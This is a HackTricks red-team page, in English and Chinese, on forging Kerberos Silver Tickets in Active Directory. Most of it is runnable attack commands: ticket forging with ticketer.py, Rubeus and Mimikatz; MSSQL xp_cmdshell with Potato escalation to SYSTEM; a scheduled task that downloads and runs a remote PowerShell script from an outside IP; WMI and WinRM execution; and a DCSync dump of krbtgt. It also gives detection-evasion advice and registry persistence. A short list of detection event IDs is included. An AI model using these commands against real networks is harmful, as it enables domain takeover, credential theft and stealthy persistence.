Silver Ticket

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

• 查看 订阅计划!
• 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
• 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

Silver ticket

The Silver Ticket attack involves the exploitation of service tickets in Active Directory (AD) environments. This method relies on acquiring the NTLM hash of a service account, such as a computer account, to forge a Ticket Granting Service (TGS) ticket. With this forged ticket, an attacker can access specific services on the network, impersonating any user, typically aiming for administrative privileges. It’s emphasized that using AES keys for forging tickets is more secure and less detectable.

Warning

Silver Tickets are less detectable than Golden Tickets because they only require the hash of the service account, not the krbtgt account. However, they are limited to the specific service they target. Moreover, just stealing the password of a user. Moreover, if you compromise an account’s password with a SPN you can use that password to create a Silver Ticket impersonating any user to that service.

Modern Kerberos changes (AES-only domains)

• Windows updates starting 8 Nov 2022 (KB5021131) default service tickets to AES session keys when possible and are phasing out RC4. DCs are expected to ship with RC4 disabled by default by mid‑2026, so relying on NTLM/RC4 hashes for silver tickets increasingly fails with KRB_AP_ERR_MODIFIED. Always extract AES keys (aes256-cts-hmac-sha1-96 / aes128-cts-hmac-sha1-96) for the target service account.
• If the service account msDS-SupportedEncryptionTypes is restricted to AES, you must forge with /aes256 or -aesKey; RC4 (/rc4 or -nthash) will not work even if you hold the NTLM hash.
• gMSA/computer accounts rotate every 30 days; dump the current AES key from LSASS, Secretsdump/NTDS, or DCsync before forging.
• OPSEC: default ticket lifetime in tools is often 10 years; set realistic durations (e.g., -duration 600 minutes) to avoid detection by abnormal lifetimes.

For ticket crafting, different tools are employed based on the operating system:

On Linux

# Forge with AES instead of RC4 (supports gMSA/machine accounts)
python ticketer.py -aesKey <AES256_HEX> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
-spn <SERVICE_PRINCIPAL_NAME> <USER>
# or read key directly from a keytab (useful when only keytab is obtained)
python ticketer.py -keytab service.keytab -spn <SPN> -domain <DOMAIN> -domain-sid <DOMAIN_SID> <USER>

# shorten validity for stealth
python ticketer.py -aesKey <AES256_HEX> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
-spn cifs/<HOST_FQDN> -duration 480 <USER>

export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

在 Windows 上

# Using Rubeus to request a service ticket and inject (works when you already have a TGT)
# /ldap option is used to get domain data automatically
rubeus.exe asktgs /user:<USER> [/aes256:<HASH> /aes128:<HASH> /rc4:<HASH>] \
/domain:<DOMAIN> /ldap /service:cifs/<TARGET_FQDN> /ptt /nowrap /printcmd

# Forging the ticket directly with Mimikatz (silver ticket => /service + /target)
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> \
/aes256:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET> /ptt"
# RC4 still works only if the DC and service accept RC4
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> \
/rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET> /ptt"

# Inject an already forged kirbi
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

CIFS 服务被强调为访问受害者文件系统的常见目标，但像 HOST 和 RPCSS 这样的其他服务也可以被利用来执行任务和 WMI 查询。

示例：MSSQL service (MSSQLSvc) + Potato 提权到 SYSTEM

如果你掌握某个 SQL 服务帐户（例如 sqlsvc）的 NTLM hash（或 AES key），你可以为 MSSQL SPN 伪造一个 TGS，并向 SQL 服务冒充任意用户。从那里，启用 xp_cmdshell 以 SQL 服务帐户的身份执行命令。如果该令牌具有 SeImpersonatePrivilege，则可以链式利用 Potato 提权到 SYSTEM。

# Forge a silver ticket for MSSQLSvc (AES example)
python ticketer.py -aesKey <SQLSVC_AES256> -domain-sid <DOMAIN_SID> -domain <DOMAIN> \
-spn MSSQLSvc/<host.fqdn>:1433 administrator
export KRB5CCNAME=$PWD/administrator.ccache

# Connect to SQL using Kerberos and run commands via xp_cmdshell
impacket-mssqlclient -k -no-pass <DOMAIN>/administrator@<host.fqdn>:1433 \
-q "EXEC sp_configure 'show advanced options',1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;EXEC xp_cmdshell 'whoami'"

• 如果获得的上下文具有 SeImpersonatePrivilege（对于 service accounts 通常为真），使用 Potato 变体获取 SYSTEM:

# On the target host (via xp_cmdshell or interactive), run e.g. PrintSpoofer/GodPotato
PrintSpoofer.exe -c "cmd /c whoami"
# or
GodPotato -cmd "cmd /c whoami"

More details on abusing MSSQL and enabling xp_cmdshell:

MSSQL AD Abuse

Potato techniques overview:

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

可用服务

使用 Rubeus 你可以使用以下参数请求所有这些票据：

• /altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Silver tickets 事件 ID

• 4624：Account Logon
• 4634：Account Logoff
• 4672：Admin Logon
• 在 DC 上没有 4768/4769 的前置事件 对于同一客户端/服务通常是伪造 TGS 直接呈现给服务的常见指示器。
• 异常长的票据有效期或意外的加密类型（例如域强制使用 AES 时出现 RC4）在 4769/4624 的数据中也会很显眼。

持久性

为避免机器每 30 天轮换其密码，可设置 HKLM\SYSTEM\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange = 1，或者将 HKLM\SYSTEM\CurrentControlSet\Services\NetLogon\Parameters\MaximumPasswordAge 设置为大于 30 天的值，以指示机器密码应轮换的周期。

滥用 Service tickets

在下面的示例中，假设通过模拟管理员账户检索到了票据。

CIFS

使用此票据，你可以通过 SMB 访问 C$ 和 ADMIN$ 共享（如果它们被暴露），并将文件复制到远程文件系统的某个位置，例如执行类似以下操作：

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

您还可以使用 psexec 在主机内获取 shell 或执行任意命令：

PsExec/Winexec/ScExec

主机

拥有此权限后，您可以在远程计算机上创建计划任务并执行任意命令：

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

HOST + RPCSS

使用这些票证，你可以在受害者系统上执行 WMI：

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

在以下页面查找 有关 wmiexec 的更多信息：

WmiExec

主机 + WSMAN (WINRM)

通过对某台计算机的 winrm 访问，你可以 访问它，甚至获得一个 PowerShell:

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

查看以下页面以了解 更多使用 winrm 连接远程主机的方法：

WinRM

Warning

请注意，远程计算机必须 启用并监听 winrm 才能访问它。

LDAP

拥有此权限后，你可以使用 DCSync dump DC 数据库：

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

了解有关 DCSync 的更多信息 在以下页面：

DCSync

参考资料

• https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/kerberos-silver-tickets
• https://www.tarlogic.com/blog/how-to-attack-kerberos/
• https://techcommunity.microsoft.com/blog/askds/machine-account-password-process/396027
• HTB Sendai – 0xdf: Silver Ticket + Potato path
• KB5021131 Kerberos hardening & RC4 deprecation
• Impacket ticketer.py current options (AES/keytab/duration)

Tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

• 查看 订阅计划!
• 加入 💬 Discord 群组 或 Telegram 群组 或 在 Twitter 🐦 上关注我们 @hacktricks_live.
• 通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。